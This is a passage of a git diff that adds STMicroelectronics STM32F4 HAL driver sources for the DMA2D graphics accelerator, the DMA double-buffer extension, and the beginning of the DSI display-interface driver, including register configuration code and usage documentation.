interrupt */ + __HAL_DMA2D_DISABLE_IT(hdma2d, DMA2D_IT_CTC); + + /* Clear the CLUT transfer complete flag */ + __HAL_DMA2D_CLEAR_FLAG(hdma2d, DMA2D_FLAG_CTC); + + /* Update error code */ + hdma2d->ErrorCode |= HAL_DMA2D_ERROR_NONE; + + /* Change DMA2D state */ + hdma2d->State = HAL_DMA2D_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hdma2d); + + /* CLUT Transfer complete Callback */ +#if (USE_HAL_DMA2D_REGISTER_CALLBACKS == 1) + hdma2d->CLUTLoadingCpltCallback(hdma2d); +#else + HAL_DMA2D_CLUTLoadingCpltCallback(hdma2d); +#endif /* USE_HAL_DMA2D_REGISTER_CALLBACKS */ + } + } + +} + +/** + * @brief Transfer watermark callback. + * @param hdma2d pointer to a DMA2D_HandleTypeDef structure that contains + * the configuration information for the DMA2D. + * @retval None + */ +__weak void HAL_DMA2D_LineEventCallback(DMA2D_HandleTypeDef *hdma2d) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hdma2d); + + /* NOTE : This function should not be modified; when the callback is needed, + the HAL_DMA2D_LineEventCallback can be implemented in the user file. + */ +} + +/** + * @brief CLUT Transfer Complete callback. + * @param hdma2d pointer to a DMA2D_HandleTypeDef structure that contains + * the configuration information for the DMA2D. + * @retval None + */ +__weak void HAL_DMA2D_CLUTLoadingCpltCallback(DMA2D_HandleTypeDef *hdma2d) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hdma2d); + + /* NOTE : This function should not be modified; when the callback is needed, + the HAL_DMA2D_CLUTLoadingCpltCallback can be implemented in the user file. + */ +} + +/** + * @} + */ + +/** @defgroup DMA2D_Exported_Functions_Group3 Peripheral Control functions + * @brief Peripheral Control functions + * +@verbatim + =============================================================================== + ##### Peripheral Control functions ##### + =============================================================================== + [..] This section provides functions allowing to: + (+) Configure the DMA2D foreground or background layer parameters. + (+) Configure the DMA2D CLUT transfer. + (+) Configure the line watermark + (+) Configure the dead time value. + (+) Enable or disable the dead time value functionality. + + +@endverbatim + * @{ + */ + +/** + * @brief Configure the DMA2D Layer according to the specified + * parameters in the DMA2D_HandleTypeDef. + * @param hdma2d Pointer to a DMA2D_HandleTypeDef structure that contains + * the configuration information for the DMA2D. + * @param LayerIdx DMA2D Layer index. + * This parameter can be one of the following values: + * DMA2D_BACKGROUND_LAYER(0) / DMA2D_FOREGROUND_LAYER(1) + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DMA2D_ConfigLayer(DMA2D_HandleTypeDef *hdma2d, uint32_t LayerIdx) +{ + DMA2D_LayerCfgTypeDef *pLayerCfg; + uint32_t regMask; + uint32_t regValue; + + /* Check the parameters */ + assert_param(IS_DMA2D_LAYER(LayerIdx)); + assert_param(IS_DMA2D_OFFSET(hdma2d->LayerCfg[LayerIdx].InputOffset)); + if (hdma2d->Init.Mode != DMA2D_R2M) + { + assert_param(IS_DMA2D_INPUT_COLOR_MODE(hdma2d->LayerCfg[LayerIdx].InputColorMode)); + if (hdma2d->Init.Mode != DMA2D_M2M) + { + assert_param(IS_DMA2D_ALPHA_MODE(hdma2d->LayerCfg[LayerIdx].AlphaMode)); + } + } + + /* Process locked */ + __HAL_LOCK(hdma2d); + + /* Change DMA2D peripheral state */ + hdma2d->State = HAL_DMA2D_STATE_BUSY; + + pLayerCfg = &hdma2d->LayerCfg[LayerIdx]; + + /* Prepare the value to be written to the BGPFCCR or FGPFCCR register */ + regValue = pLayerCfg->InputColorMode | (pLayerCfg->AlphaMode << DMA2D_BGPFCCR_AM_Pos); + regMask = DMA2D_BGPFCCR_CM | DMA2D_BGPFCCR_AM | DMA2D_BGPFCCR_ALPHA; + + + if ((pLayerCfg->InputColorMode == DMA2D_INPUT_A4) || (pLayerCfg->InputColorMode == DMA2D_INPUT_A8)) + { + regValue |= (pLayerCfg->InputAlpha & DMA2D_BGPFCCR_ALPHA); + } + else + { + regValue |= (pLayerCfg->InputAlpha << DMA2D_BGPFCCR_ALPHA_Pos); + } + + /* Configure the background DMA2D layer */ + if (LayerIdx == DMA2D_BACKGROUND_LAYER) + { + /* Write DMA2D BGPFCCR register */ + MODIFY_REG(hdma2d->Instance->BGPFCCR, regMask, regValue); + + /* DMA2D BGOR register configuration -------------------------------------*/ + WRITE_REG(hdma2d->Instance->BGOR, pLayerCfg->InputOffset); + + /* DMA2D BGCOLR register configuration -------------------------------------*/ + if ((pLayerCfg->InputColorMode == DMA2D_INPUT_A4) || (pLayerCfg->InputColorMode == DMA2D_INPUT_A8)) + { + WRITE_REG(hdma2d->Instance->BGCOLR, pLayerCfg->InputAlpha & (DMA2D_BGCOLR_BLUE | DMA2D_BGCOLR_GREEN | \ + DMA2D_BGCOLR_RED)); + } + } + /* Configure the foreground DMA2D layer */ + else + { + + + /* Write DMA2D FGPFCCR register */ + MODIFY_REG(hdma2d->Instance->FGPFCCR, regMask, regValue); + + /* DMA2D FGOR register configuration -------------------------------------*/ + WRITE_REG(hdma2d->Instance->FGOR, pLayerCfg->InputOffset); + + /* DMA2D FGCOLR register configuration -------------------------------------*/ + if ((pLayerCfg->InputColorMode == DMA2D_INPUT_A4) || (pLayerCfg->InputColorMode == DMA2D_INPUT_A8)) + { + WRITE_REG(hdma2d->Instance->FGCOLR, pLayerCfg->InputAlpha & (DMA2D_FGCOLR_BLUE | DMA2D_FGCOLR_GREEN | \ + DMA2D_FGCOLR_RED)); + } + } + /* Initialize the DMA2D state*/ + hdma2d->State = HAL_DMA2D_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hdma2d); + + return HAL_OK; +} + +/** + * @brief Configure the DMA2D CLUT Transfer. + * @param hdma2d Pointer to a DMA2D_HandleTypeDef structure that contains + * the configuration information for the DMA2D. + * @param CLUTCfg Pointer to a DMA2D_CLUTCfgTypeDef structure that contains + * the configuration information for the color look up table. + * @param LayerIdx DMA2D Layer index. + * This parameter can be one of the following values: + * DMA2D_BACKGROUND_LAYER(0) / DMA2D_FOREGROUND_LAYER(1) + * @note API obsolete and maintained for compatibility with legacy. User is invited + * to resort to HAL_DMA2D_CLUTStartLoad() instead to benefit from code compactness, + * code size and improved heap usage. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DMA2D_ConfigCLUT(DMA2D_HandleTypeDef *hdma2d, DMA2D_CLUTCfgTypeDef CLUTCfg, uint32_t LayerIdx) +{ + /* Check the parameters */ + assert_param(IS_DMA2D_LAYER(LayerIdx)); + assert_param(IS_DMA2D_CLUT_CM(CLUTCfg.CLUTColorMode)); + assert_param(IS_DMA2D_CLUT_SIZE(CLUTCfg.Size)); + + /* Process locked */ + __HAL_LOCK(hdma2d); + + /* Change DMA2D peripheral state */ + hdma2d->State = HAL_DMA2D_STATE_BUSY; + + /* Configure the CLUT of the background DMA2D layer */ + if (LayerIdx == DMA2D_BACKGROUND_LAYER) + { + /* Write background CLUT memory address */ + WRITE_REG(hdma2d->Instance->BGCMAR, (uint32_t)CLUTCfg.pCLUT); + + /* Write background CLUT size and CLUT color mode */ + MODIFY_REG(hdma2d->Instance->BGPFCCR, (DMA2D_BGPFCCR_CS | DMA2D_BGPFCCR_CCM), + ((CLUTCfg.Size << DMA2D_BGPFCCR_CS_Pos) | (CLUTCfg.CLUTColorMode << DMA2D_BGPFCCR_CCM_Pos))); + } + /* Configure the CLUT of the foreground DMA2D layer */ + else + { + /* Write foreground CLUT memory address */ + WRITE_REG(hdma2d->Instance->FGCMAR, (uint32_t)CLUTCfg.pCLUT); + + /* Write foreground CLUT size and CLUT color mode */ + MODIFY_REG(hdma2d->Instance->FGPFCCR, (DMA2D_FGPFCCR_CS | DMA2D_FGPFCCR_CCM), + ((CLUTCfg.Size << DMA2D_FGPFCCR_CS_Pos) | (CLUTCfg.CLUTColorMode << DMA2D_FGPFCCR_CCM_Pos))); + } + + /* Set the DMA2D state to Ready*/ + hdma2d->State = HAL_DMA2D_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hdma2d); + + return HAL_OK; +} + + +/** + * @brief Configure the line watermark. + * @param hdma2d Pointer to a DMA2D_HandleTypeDef structure that contains + * the configuration information for the DMA2D. + * @param Line Line Watermark configuration (maximum 16-bit long value expected). + * @note HAL_DMA2D_ProgramLineEvent() API enables the transfer watermark interrupt. + * @note The transfer watermark interrupt is disabled once it has occurred. + * @retval HAL status + */ + +HAL_StatusTypeDef HAL_DMA2D_ProgramLineEvent(DMA2D_HandleTypeDef *hdma2d, uint32_t Line) +{ + /* Check the parameters */ + if (Line > DMA2D_LWR_LW) + { + return HAL_ERROR; + } + else + { + /* Process locked */ + __HAL_LOCK(hdma2d); + + /* Change DMA2D peripheral state */ + hdma2d->State = HAL_DMA2D_STATE_BUSY; + + /* Sets the Line watermark configuration */ + WRITE_REG(hdma2d->Instance->LWR, Line); + + /* Enable the Line interrupt */ + __HAL_DMA2D_ENABLE_IT(hdma2d, DMA2D_IT_TW); + + /* Initialize the DMA2D state*/ + hdma2d->State = HAL_DMA2D_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hdma2d); + + return HAL_OK; + } +} + +/** + * @brief Enable DMA2D dead time feature. + * @param hdma2d DMA2D handle. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DMA2D_EnableDeadTime(DMA2D_HandleTypeDef *hdma2d) +{ + /* Process Locked */ + __HAL_LOCK(hdma2d); + + hdma2d->State = HAL_DMA2D_STATE_BUSY; + + /* Set DMA2D_AMTCR EN bit */ + SET_BIT(hdma2d->Instance->AMTCR, DMA2D_AMTCR_EN); + + hdma2d->State = HAL_DMA2D_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hdma2d); + + return HAL_OK; +} + +/** + * @brief Disable DMA2D dead time feature. + * @param hdma2d DMA2D handle. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DMA2D_DisableDeadTime(DMA2D_HandleTypeDef *hdma2d) +{ + /* Process Locked */ + __HAL_LOCK(hdma2d); + + hdma2d->State = HAL_DMA2D_STATE_BUSY; + + /* Clear DMA2D_AMTCR EN bit */ + CLEAR_BIT(hdma2d->Instance->AMTCR, DMA2D_AMTCR_EN); + + hdma2d->State = HAL_DMA2D_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hdma2d); + + return HAL_OK; +} + +/** + * @brief Configure dead time. + * @note The dead time value represents the guaranteed minimum number of cycles between + * two consecutive transactions on the AHB bus. + * @param hdma2d DMA2D handle. + * @param DeadTime dead time value. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DMA2D_ConfigDeadTime(DMA2D_HandleTypeDef *hdma2d, uint8_t DeadTime) +{ + /* Process Locked */ + __HAL_LOCK(hdma2d); + + hdma2d->State = HAL_DMA2D_STATE_BUSY; + + /* Set DMA2D_AMTCR DT field */ + MODIFY_REG(hdma2d->Instance->AMTCR, DMA2D_AMTCR_DT, (((uint32_t) DeadTime) << DMA2D_AMTCR_DT_Pos)); + + hdma2d->State = HAL_DMA2D_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hdma2d); + + return HAL_OK; +} + +/** + * @} + */ + + +/** @defgroup DMA2D_Exported_Functions_Group4 Peripheral State and Error functions + * @brief Peripheral State functions + * +@verbatim + =============================================================================== + ##### Peripheral State and Errors functions ##### + =============================================================================== + [..] + This subsection provides functions allowing to: + (+) Get the DMA2D state + (+) Get the DMA2D error code + +@endverbatim + * @{ + */ + +/** + * @brief Return the DMA2D state + * @param hdma2d pointer to a DMA2D_HandleTypeDef structure that contains + * the configuration information for the DMA2D. + * @retval HAL state + */ +HAL_DMA2D_StateTypeDef HAL_DMA2D_GetState(DMA2D_HandleTypeDef *hdma2d) +{ + return hdma2d->State; +} + +/** + * @brief Return the DMA2D error code + * @param hdma2d pointer to a DMA2D_HandleTypeDef structure that contains + * the configuration information for DMA2D. + * @retval DMA2D Error Code + */ +uint32_t HAL_DMA2D_GetError(DMA2D_HandleTypeDef *hdma2d) +{ + return hdma2d->ErrorCode; +} + +/** + * @} + */ + +/** + * @} + */ + + +/** @defgroup DMA2D_Private_Functions DMA2D Private Functions + * @{ + */ + +/** + * @brief Set the DMA2D transfer parameters. + * @param hdma2d Pointer to a DMA2D_HandleTypeDef structure that contains + * the configuration information for the specified DMA2D. + * @param pdata The source memory Buffer address + * @param DstAddress The destination memory Buffer address + * @param Width The width of data to be transferred from source to destination. + * @param Height The height of data to be transferred from source to destination. + * @retval HAL status + */ +static void DMA2D_SetConfig(DMA2D_HandleTypeDef *hdma2d, uint32_t pdata, uint32_t DstAddress, uint32_t Width, + uint32_t Height) +{ + uint32_t tmp; + uint32_t tmp1; + uint32_t tmp2; + uint32_t tmp3; + uint32_t tmp4; + + /* Configure DMA2D data size */ + MODIFY_REG(hdma2d->Instance->NLR, (DMA2D_NLR_NL | DMA2D_NLR_PL), (Height | (Width << DMA2D_NLR_PL_Pos))); + + /* Configure DMA2D destination address */ + WRITE_REG(hdma2d->Instance->OMAR, DstAddress); + + /* Register to memory DMA2D mode selected */ + if (hdma2d->Init.Mode == DMA2D_R2M) + { + tmp1 = pdata & DMA2D_OCOLR_ALPHA_1; + tmp2 = pdata & DMA2D_OCOLR_RED_1; + tmp3 = pdata & DMA2D_OCOLR_GREEN_1; + tmp4 = pdata & DMA2D_OCOLR_BLUE_1; + + /* Prepare the value to be written to the OCOLR register according to the color mode */ + if (hdma2d->Init.ColorMode == DMA2D_OUTPUT_ARGB8888) + { + tmp = (tmp3 | tmp2 | tmp1 | tmp4); + } + else if (hdma2d->Init.ColorMode == DMA2D_OUTPUT_RGB888) + { + tmp = (tmp3 | tmp2 | tmp4); + } + else if (hdma2d->Init.ColorMode == DMA2D_OUTPUT_RGB565) + { + tmp2 = (tmp2 >> 19U); + tmp3 = (tmp3 >> 10U); + tmp4 = (tmp4 >> 3U); + tmp = ((tmp3 << 5U) | (tmp2 << 11U) | tmp4); + } + else if (hdma2d->Init.ColorMode == DMA2D_OUTPUT_ARGB1555) + { + tmp1 = (tmp1 >> 31U); + tmp2 = (tmp2 >> 19U); + tmp3 = (tmp3 >> 11U); + tmp4 = (tmp4 >> 3U); + tmp = ((tmp3 << 5U) | (tmp2 << 10U) | (tmp1 << 15U) | tmp4); + } + else /* Dhdma2d->Init.ColorMode = DMA2D_OUTPUT_ARGB4444 */ + { + tmp1 = (tmp1 >> 28U); + tmp2 = (tmp2 >> 20U); + tmp3 = (tmp3 >> 12U); + tmp4 = (tmp4 >> 4U); + tmp = ((tmp3 << 4U) | (tmp2 << 8U) | (tmp1 << 12U) | tmp4); + } + /* Write to DMA2D OCOLR register */ + WRITE_REG(hdma2d->Instance->OCOLR, tmp); + } + else /* M2M, M2M_PFC or M2M_Blending DMA2D Mode */ + { + /* Configure DMA2D source address */ + WRITE_REG(hdma2d->Instance->FGMAR, pdata); + } +} + +/** + * @} + */ + +/** + * @} + */ + +/** + * @} + */ +#endif /* DMA2D */ +#endif /* HAL_DMA2D_MODULE_ENABLED */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_dma_ex.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_dma_ex.c new file mode 100644 index 000000000..6e0737683 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_dma_ex.c @@ -0,0 +1,315 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_dma_ex.c + * @author MCD Application Team + * @brief DMA Extension HAL module driver + * This file provides firmware functions to manage the following + * functionalities of the DMA Extension peripheral: + * + Extended features functions + * + @verbatim + ============================================================================== + ##### How to use this driver ##### + ============================================================================== + [..] + The DMA Extension HAL driver can be used as follows: + (#) Start a multi buffer transfer using the HAL_DMA_MultiBufferStart() function + for polling mode or HAL_DMA_MultiBufferStart_IT() for interrupt mode. + + -@- In Memory-to-Memory transfer mode, Multi (Double) Buffer mode is not allowed. + -@- When Multi (Double) Buffer mode is enabled the, transfer is circular by default. + -@- In Multi (Double) buffer mode, it is possible to update the base address for + the AHB memory port on the fly (DMA_SxM0AR or DMA_SxM1AR) when the stream is enabled. + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2017 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup DMAEx DMAEx + * @brief DMA Extended HAL module driver + * @{ + */ + +#ifdef HAL_DMA_MODULE_ENABLED + +/* Private types -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private Constants ---------------------------------------------------------*/ +/* Private macros ------------------------------------------------------------*/ +/* Private functions ---------------------------------------------------------*/ +/** @addtogroup DMAEx_Private_Functions + * @{ + */ +static void DMA_MultiBufferSetConfig(DMA_HandleTypeDef *hdma, uint32_t SrcAddress, uint32_t DstAddress, uint32_t DataLength); +/** + * @} + */ + +/* Exported functions ---------------------------------------------------------*/ + +/** @addtogroup DMAEx_Exported_Functions + * @{ + */ + + +/** @addtogroup DMAEx_Exported_Functions_Group1 + * +@verbatim + =============================================================================== + ##### Extended features functions ##### + =============================================================================== + [..] This section provides functions allowing to: + (+) Configure the source, destination address and data length and + Start MultiBuffer DMA transfer + (+) Configure the source, destination address and data length and + Start MultiBuffer DMA transfer with interrupt + (+) Change on the fly the memory0 or memory1 address. + +@endverbatim + * @{ + */ + + +/** + * @brief Starts the multi_buffer DMA Transfer. + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA Stream. + * @param SrcAddress The source memory Buffer address + * @param DstAddress The destination memory Buffer address + * @param SecondMemAddress The second memory Buffer address in case of multi buffer Transfer + * @param DataLength The length of data to be transferred from source to destination + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DMAEx_MultiBufferStart(DMA_HandleTypeDef *hdma, uint32_t SrcAddress, uint32_t DstAddress, uint32_t SecondMemAddress, uint32_t DataLength) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check the parameters */ + assert_param(IS_DMA_BUFFER_SIZE(DataLength)); + + /* Memory-to-memory transfer not supported in double buffering mode */ + if (hdma->Init.Direction == DMA_MEMORY_TO_MEMORY) + { + hdma->ErrorCode = HAL_DMA_ERROR_NOT_SUPPORTED; + status = HAL_ERROR; + } + else + { + /* Process Locked */ + __HAL_LOCK(hdma); + + if(HAL_DMA_STATE_READY == hdma->State) + { + /* Change DMA peripheral state */ + hdma->State = HAL_DMA_STATE_BUSY; + + /* Enable the double buffer mode */ + hdma->Instance->CR |= (uint32_t)DMA_SxCR_DBM; + + /* Configure DMA Stream destination address */ + hdma->Instance->M1AR = SecondMemAddress; + + /* Configure the source, destination address and the data length */ + DMA_MultiBufferSetConfig(hdma, SrcAddress, DstAddress, DataLength); + + /* Enable the peripheral */ + __HAL_DMA_ENABLE(hdma); + } + else + { + /* Return error status */ + status = HAL_BUSY; + } + } + return status; +} + +/** + * @brief Starts the multi_buffer DMA Transfer with interrupt enabled. + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA Stream. + * @param SrcAddress The source memory Buffer address + * @param DstAddress The destination memory Buffer address + * @param SecondMemAddress The second memory Buffer address in case of multi buffer Transfer + * @param DataLength The length of data to be transferred from source to destination + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DMAEx_MultiBufferStart_IT(DMA_HandleTypeDef *hdma, uint32_t SrcAddress, uint32_t DstAddress, uint32_t SecondMemAddress, uint32_t DataLength) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check the parameters */ + assert_param(IS_DMA_BUFFER_SIZE(DataLength)); + + /* Memory-to-memory transfer not supported in double buffering mode */ + if (hdma->Init.Direction == DMA_MEMORY_TO_MEMORY) + { + hdma->ErrorCode = HAL_DMA_ERROR_NOT_SUPPORTED; + return HAL_ERROR; + } + + /* Check callback functions */ + if ((NULL == hdma->XferCpltCallback) || (NULL == hdma->XferM1CpltCallback) || (NULL == hdma->XferErrorCallback)) + { + hdma->ErrorCode = HAL_DMA_ERROR_PARAM; + return HAL_ERROR; + } + + /* Process locked */ + __HAL_LOCK(hdma); + + if(HAL_DMA_STATE_READY == hdma->State) + { + /* Change DMA peripheral state */ + hdma->State = HAL_DMA_STATE_BUSY; + + /* Initialize the error code */ + hdma->ErrorCode = HAL_DMA_ERROR_NONE; + + /* Enable the Double buffer mode */ + hdma->Instance->CR |= (uint32_t)DMA_SxCR_DBM; + + /* Configure DMA Stream destination address */ + hdma->Instance->M1AR = SecondMemAddress; + + /* Configure the source, destination address and the data length */ + DMA_MultiBufferSetConfig(hdma, SrcAddress, DstAddress, DataLength); + + /* Clear all flags */ + __HAL_DMA_CLEAR_FLAG (hdma, __HAL_DMA_GET_TC_FLAG_INDEX(hdma)); + __HAL_DMA_CLEAR_FLAG (hdma, __HAL_DMA_GET_HT_FLAG_INDEX(hdma)); + __HAL_DMA_CLEAR_FLAG (hdma, __HAL_DMA_GET_TE_FLAG_INDEX(hdma)); + __HAL_DMA_CLEAR_FLAG (hdma, __HAL_DMA_GET_DME_FLAG_INDEX(hdma)); + __HAL_DMA_CLEAR_FLAG (hdma, __HAL_DMA_GET_FE_FLAG_INDEX(hdma)); + + /* Enable Common interrupts*/ + hdma->Instance->CR |= DMA_IT_TC | DMA_IT_TE | DMA_IT_DME; + hdma->Instance->FCR |= DMA_IT_FE; + + if((hdma->XferHalfCpltCallback != NULL) || (hdma->XferM1HalfCpltCallback != NULL)) + { + hdma->Instance->CR |= DMA_IT_HT; + } + + /* Enable the peripheral */ + __HAL_DMA_ENABLE(hdma); + } + else + { + /* Process unlocked */ + __HAL_UNLOCK(hdma); + + /* Return error status */ + status = HAL_BUSY; + } + return status; +} + +/** + * @brief Change the memory0 or memory1 address on the fly. + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA Stream. + * @param Address The new address + * @param memory the memory to be changed, This parameter can be one of + * the following values: + * MEMORY0 / + * MEMORY1 + * @note The MEMORY0 address can be changed only when the current transfer use + * MEMORY1 and the MEMORY1 address can be changed only when the current + * transfer use MEMORY0. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DMAEx_ChangeMemory(DMA_HandleTypeDef *hdma, uint32_t Address, HAL_DMA_MemoryTypeDef memory) +{ + if(memory == MEMORY0) + { + /* change the memory0 address */ + hdma->Instance->M0AR = Address; + } + else + { + /* change the memory1 address */ + hdma->Instance->M1AR = Address; + } + + return HAL_OK; +} + +/** + * @} + */ + +/** + * @} + */ + +/** @addtogroup DMAEx_Private_Functions + * @{ + */ + +/** + * @brief Set the DMA Transfer parameter. + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA Stream. + * @param SrcAddress The source memory Buffer address + * @param DstAddress The destination memory Buffer address + * @param DataLength The length of data to be transferred from source to destination + * @retval HAL status + */ +static void DMA_MultiBufferSetConfig(DMA_HandleTypeDef *hdma, uint32_t SrcAddress, uint32_t DstAddress, uint32_t DataLength) +{ + /* Configure DMA Stream data length */ + hdma->Instance->NDTR = DataLength; + + /* Peripheral to Memory */ + if((hdma->Init.Direction) == DMA_MEMORY_TO_PERIPH) + { + /* Configure DMA Stream destination address */ + hdma->Instance->PAR = DstAddress; + + /* Configure DMA Stream source address */ + hdma->Instance->M0AR = SrcAddress; + } + /* Memory to Peripheral */ + else + { + /* Configure DMA Stream source address */ + hdma->Instance->PAR = SrcAddress; + + /* Configure DMA Stream destination address */ + hdma->Instance->M0AR = DstAddress; + } +} + +/** + * @} + */ + +#endif /* HAL_DMA_MODULE_ENABLED */ +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_dsi.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_dsi.c new file mode 100644 index 000000000..da57a8fa6 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_dsi.c @@ -0,0 +1,2731 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_dsi.c + * @author MCD Application Team + * @brief DSI HAL module driver. + * This file provides firmware functions to manage the following + * functionalities of the DSI peripheral: + * + Initialization and de-initialization functions + * + IO operation functions + * + Peripheral Control functions + * + Peripheral State and Errors functions + @verbatim + ============================================================================== + ##### How to use this driver ##### + ============================================================================== + [..] + The DSI HAL driver can be used as follows: + + (#) Declare a DSI_HandleTypeDef handle structure, for example: DSI_HandleTypeDef hdsi; + + (#) Initialize the DSI low level resources by implementing the HAL_DSI_MspInit() API: + (##) Enable the DSI interface clock + (##) NVIC configuration if you need to use interrupt process + (+++) Configure the DSI interrupt priority + (+++) Enable the NVIC DSI IRQ Channel + + (#) Initialize the DSI Host peripheral, the required PLL parameters, number of lances and + TX Escape clock divider by calling the HAL_DSI_Init() API which calls HAL_DSI_MspInit(). + + *** Configuration *** + ========================= + [..] + (#) Use HAL_DSI_ConfigAdaptedCommandMode() function to configure the DSI host in adapted + command mode. + + (#) When operating in video mode , use HAL_DSI_ConfigVideoMode() to configure the DSI host. + + (#) Function HAL_DSI_ConfigCommand() is used to configure the DSI commands behavior in low power mode. + + (#) To configure the DSI PHY timings parameters, use function HAL_DSI_ConfigPhyTimer(). + + (#) The DSI Host can be started/stopped using respectively functions HAL_DSI_Start() and HAL_DSI_Stop(). + Functions HAL_DSI_ShortWrite(), HAL_DSI_LongWrite() and HAL_DSI_Read() allows respectively + to write DSI short packets, long packets and to read DSI packets. + + (#) The DSI Host Offers two Low power modes : + (++) Low Power Mode on data lanes only: Only DSI data lanes are shut down. + It is possible to enter/exit from this mode using respectively functions HAL_DSI_EnterULPMData() + and HAL_DSI_ExitULPMData() + + (++) Low Power Mode on data and clock lanes : All DSI lanes are shut down including data and clock lanes. + It is possible to enter/exit from this mode using respectively functions HAL_DSI_EnterULPM() + and HAL_DSI_ExitULPM() + + (#) To control DSI state you can use the following function: HAL_DSI_GetState() + + *** Error management *** + ======================== + [..] + (#) User can select the DSI errors to be reported/monitored using function HAL_DSI_ConfigErrorMonitor() + When an error occurs, the callback HAL_DSI_ErrorCallback() is asserted and then user can retrieve + the error code by calling function HAL_DSI_GetError() + + *** DSI HAL driver macros list *** + ============================================= + [..] + Below the list of most used macros in DSI HAL driver. + + (+) __HAL_DSI_ENABLE: Enable the DSI Host. + (+) __HAL_DSI_DISABLE: Disable the DSI Host. + (+) __HAL_DSI_WRAPPER_ENABLE: Enables the DSI wrapper. + (+) __HAL_DSI_WRAPPER_DISABLE: Disable the DSI wrapper. + (+) __HAL_DSI_PLL_ENABLE: Enables the DSI PLL. + (+) __HAL_DSI_PLL_DISABLE: Disables the DSI PLL. + (+) __HAL_DSI_REG_ENABLE: Enables the DSI regulator. + (+) __HAL_DSI_REG_DISABLE: Disables the DSI regulator. + (+) __HAL_DSI_GET_FLAG: Get the DSI pending flags. + (+) __HAL_DSI_CLEAR_FLAG: Clears the DSI pending flags. + (+) __HAL_DSI_ENABLE_IT: Enables the specified DSI interrupts. + (+) __HAL_DSI_DISABLE_IT: Disables the specified DSI interrupts. + (+) __HAL_DSI_GET_IT_SOURCE: Checks whether the specified DSI interrupt source is enabled or not. + + [..] + (@) You can refer to the DSI HAL driver header file for more useful macros + + *** Callback registration *** + ============================================= + [..] + The compilation define USE_HAL_DSI_REGISTER_CALLBACKS when set to 1 + allows the user to configure dynamically the driver callbacks. + Use Function HAL_DSI_RegisterCallback() to register a callback. + + [..] + Function HAL_DSI_RegisterCallback() allows to register following callbacks: + (+) TearingEffectCallback : DSI Tearing Effect Callback. + (+) EndOfRefreshCallback : DSI End Of Refresh Callback. + (+) ErrorCallback : DSI Error Callback + (+) MspInitCallback : DSI MspInit. + (+) MspDeInitCallback : DSI MspDeInit. + [..] + This function takes as parameters the HAL peripheral handle, the callback ID + and a pointer to the user callback function. + + [..] + Use function HAL_DSI_UnRegisterCallback() to reset a callback to the default + weak function. + HAL_DSI_UnRegisterCallback takes as parameters the HAL peripheral handle, + and the callback ID. + [..] + This function allows to reset following callbacks: + (+) TearingEffectCallback : DSI Tearing Effect Callback. + (+) EndOfRefreshCallback : DSI End Of Refresh Callback. + (+) ErrorCallback : DSI Error Callback + (+) MspInitCallback : DSI MspInit. + (+) MspDeInitCallback : DSI MspDeInit. + + [..] + By default, after the HAL_DSI_Init and when the state is HAL_DSI_STATE_RESET + all callbacks are set to the corresponding weak functions: + examples HAL_DSI_TearingEffectCallback(), HAL_DSI_EndOfRefreshCallback(). + Exception done for MspInit and MspDeInit functions that are respectively + reset to the legacy weak (surcharged) functions in the HAL_DSI_Init() + and HAL_DSI_DeInit() only when these callbacks are null (not registered beforehand). + If not, MspInit or MspDeInit are not null, the HAL_DSI_Init() and HAL_DSI_DeInit() + keep and use the user MspInit/MspDeInit callbacks (registered beforehand). + + [..] + Callbacks can be registered/unregistered in HAL_DSI_STATE_READY state only. + Exception done MspInit/MspDeInit that can be registered/unregistered + in HAL_DSI_STATE_READY or HAL_DSI_STATE_RESET state, + thus registered (user) MspInit/DeInit callbacks can be used during the Init/DeInit. + In that case first register the MspInit/MspDeInit user callbacks + using HAL_DSI_RegisterCallback() before calling HAL_DSI_DeInit() + or HAL_DSI_Init() function. + + [..] + When The compilation define USE_HAL_DSI_REGISTER_CALLBACKS is set to 0 or + not defined, the callback registration feature is not available and all callbacks + are set to the corresponding weak functions. + + @endverbatim + 